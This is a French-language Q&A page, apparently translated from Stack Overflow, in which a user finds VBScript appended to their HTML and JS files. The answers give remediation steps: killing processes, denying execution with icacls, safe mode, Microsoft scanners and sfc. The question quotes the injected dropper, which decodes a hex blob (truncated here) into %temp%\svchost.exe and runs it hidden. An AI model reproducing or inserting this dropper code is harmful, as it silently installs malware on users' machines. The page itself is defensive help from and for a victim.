Javascript Girl
  1. Javascript Girl
  3. Comment ce code VB est-il ajouté automatiquement?
Intereting Posts
Trier une liste html avec javascript Événement pour détecter le changement d'un contrôle de numéro HTML5 dans Webkit / Chrome? Que fait «avec» en JavaScript? Quand est-ce que vous êtes censé utiliser l'échappement au lieu de encodeURI / encodeURIComponent? Grouping Legends in Highcharts Vuejs obtient-il l'élément appelé par un événement? Les coordonnées Latitude / Longitude ne sont pas correctes dans la carte amMap USA Comment faire pour organiser un événement personnel avec Javascript Javascript: cacher le contenu de la clé Passer des fonctions à setTimeout en boucle: toujours la dernière valeur? Puis-je stocker RegExp et Function dans JSON? Comment obtenir le nom du fichier lorsque l'utilisateur sélectionne un fichier via <input type = "file" />? Pourquoi console.log () ne montre-t-il pas les propriétés héritées d'Object.create? Quelle est la meilleure manière de passer les variables côté serveur vers JavaScript du côté client? Ajax call in jsf 2.0 (myfaces), la fonction JavaScript onevent dans la balise ajax est appelée avant que le rendu soit terminé

Comment ce code VB est-il ajouté automatiquement?

Chaque fois que j'ouvre des fichiers JavaScript (.js) Ou HTML (.html) après quelques jours dans Notepad ++, un script VB similaire est automatiquement ajouté à la fin. Je suis convaincu qu'il s'agit d'une sorte de virus, quelqu'un peut-il me guider sur ce sujet? 

</html> // My file ends here...... <SCRIPT Language=VBScript><!-- DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000 ...... {lots of numbers} Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--></SCRIPT><!-- ޼ .... {Lots of junk characters here } -->

Le fichier qu'il exécute est% temp% \ svchost.exe.

Par conséquent, faites une liste de tâches 

 tasklist /svc /fi "imagename eq svchost.exe"

Prendre note de svots sans aucun service contenant. Mettez le PID actuel pour xxxx 

 taskkill /pid xxxx /pid xxxx /pid xxxx /f

Cela arrêtera cette partie particulière en cours d'exécution.

La technique utilisée par le virus ne fonctionnera pas de manière fiable surtout dans les fenêtres non anglaises.

Aussi, au lieu de le supprimer, modifiez la sécurité pour éviter l'exécution jusqu'à ce que vous nettoyiez d'autres éléments qui pourraient exister. 

 icacls "%temp%\svchost.exe" /deny Everyone:F

Ceci est pour Vista mais largement applicable à toutes les versions.

Nettoyage de virus

Si vous rencontrez des problèmes dans le mode normal. Essayez de le faire en mode sans échec avec le réseautage.

Cliquez sur Démarrer – Tous les programmes – Accessoires – Exécuter et taper 

 msconfig

Ensuite, accédez à l'onglet Boot et cliquez sur Safe Boot et cochez également Network. Redémarrez. Revenez ici et décochez Safe Boot pour revenir au mode normal.

Scanner de sécurité

Le Microsoft Safety Scanner est un outil de sécurité téléchargeable gratuit qui fournit une analyse à la demande et aide à éliminer les virus, les logiciels espions et autres logiciels malveillants. Cela fonctionne avec votre logiciel antivirus existant.

http://www.microsoft.com/security/scanner/en-au/default.aspx

Outil de suppression de logiciel malveillant

Si vous ne pouvez pas télécharger ou exécuter le Scanner de sécurité, Windows a un petit programme antivirus intégré. Il cible uniquement les menaces les plus courantes. Il voudra mettre à jour, ne le laissez pas. Exécutez-le sans mise à jour. Ensuite, exécutez-le à nouveau en le mettant à jour cette fois.

Cliquez sur Démarrer – Tous les programmes – Accessoires – Exécuter (ou appuyez sur Winkey + R). Type 

 mrt

Restaurer le pare-feu

Vous pouvez réinitialiser votre pare-feu aux paramètres par défaut.

Démarrer – Tous les programmes – Accessoires – Cliquez avec le bouton droit sur Invite de commandes et choisissez Exécuter en tant qu'administrateur. Tapez (ou copiez et collez en cliquant avec le bouton droit de la souris dans la fenêtre Invite de commandes et en choisissant Coller). 

 netsh advfirewall reset export "%userprofile%\desktop\Firewall Settings.wfw"

Fixtures de sécurité

Fixits sont des programmes de dépannage de Microsoft. Il y en a 27.

Correction automatique des paramètres de sécurité Windows pour garder votre PC en sécurité

http://support.microsoft.com/mats/Malware_Prevention/en-us

et

Réparez les problèmes de sécurité pour protéger et sécuriser Windows automatiquement

http://support.microsoft.com/mats/windows_security_diagnostic/en-us

et

Réparez les problèmes d'Internet Explorer pour rendre l'IE rapide, sécuritaire et stable

http://support.microsoft.com/mats/ie_performance_and_safety/en-us

Pour la visite de la liste complète

http://support.microsoft.com/fixit/en-us

Lorsque vous choisissez de le télécharger, choisissez l'option à exécuter sur un autre ordinateur. Ensuite, vous pouvez l'enregistrer sur votre disque dur dans un dossier. Ouvrez le dossier, ouvrez le dossier Fix it Portable et exécutez Lancer Fix It. Il contiendra les 27 Fixits.

Antivirus à plein temps

Pour un antivirus permanent, nous constatons ici un manque complet de problèmes pour les personnes qui utilisent Microsoft Security Essentials.

http://www.microsoft.com/en-au/download/details.aspx?id=5201

Si tout le reste échoue

Ce programme de Microsoft lance un autre système d'exploitation de base pour nettoyer Windows. Vous devez le mettre sur un USB ou un DVD, puis démarrer à partir de celui-ci.

http://windows.microsoft.com/en-US/windows/what-is-windows-defender-offline

Regarde le détail sur la menace

Microsoft maintient une encyclopédie d'informations sur les virus.

http://www.microsoft.com/security/portal/threat/threats.aspx

Je pense également que votre système a affecté certains virus. Je veux partager un lien que j'ai rencontré qui correspond à votre question s'il vous plaît passer à travers, ici je vais publier le lien -> http://www.webdeveloper.com/forum/showthread.php?287131-VBScript-gets-inserted -automatically-in-HTML-page

Je pense que c'est un virus.

Donc, vous devez installer un logiciel antivirus si vous n'en avez pas.

Je recommande gratuitement: Microsoft Security Essentials ou Avast .

De plus, vous pouvez télécharger une utilité Antivirus spéciale juste pour numériser et ne pas l'installer – Dr Web CureIt!

Ensuite, effectuez une analyse complète de votre ordinateur.

Vous devez vérifier toutes les commandes de démarrage et supprimer tous les messages malveillants. Par exemple, CCleaner Free pourrait vous aider à les vérifier.

UPD Après avoir nettoyé et supprimé les commandes de démarrage, vous pouvez utiliser l'utilitaire sfc .

Microsoft Windows Resource Checker

Analyse l'intégrité de tous les fichiers système protégés et remplace les versions incorrectes avec les versions Microsoft correctives.

Exécutez cmd avec les privilèges d'administration, puis exécutez la commande sfc /scannow .